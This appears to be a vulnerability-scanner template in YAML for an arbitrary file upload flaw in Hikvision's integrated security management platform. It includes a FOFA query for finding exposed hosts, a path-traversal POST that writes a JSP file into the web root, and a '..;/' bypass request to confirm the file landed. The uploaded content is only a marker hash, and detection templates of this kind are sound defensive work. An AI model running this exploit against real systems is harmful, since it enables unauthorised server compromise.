product: 海康威视综合安防管理平台
vName: 海康威视综合安防管理平台 report文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: HiKVISION 综合安防管理平台 report接口存在任意文件上传漏洞，攻击者通过构造特殊的请求包可以上传任意文件，获取服务器权限
version: ''
note: ''
search:
  FOFA: app="HIKVISION-综合安防管理平台" || app="HIKVISION-iSecure-Center"
protocol: http
link: https://blog.csdn.net/qq_37113223/article/details/135762819
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /svm/api/external/report
      file:
        file:
          - ../../../../../../../../../../../opt/hikvision/web/components/tomcat85linux64.1/webapps/eportal/52e039302a62d077.jsp
          - 95cc64dd2825f9df13ec4ad683ecf339
          - application/zip
    verify:
      path: /portal/ui/login/..;/..;/52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and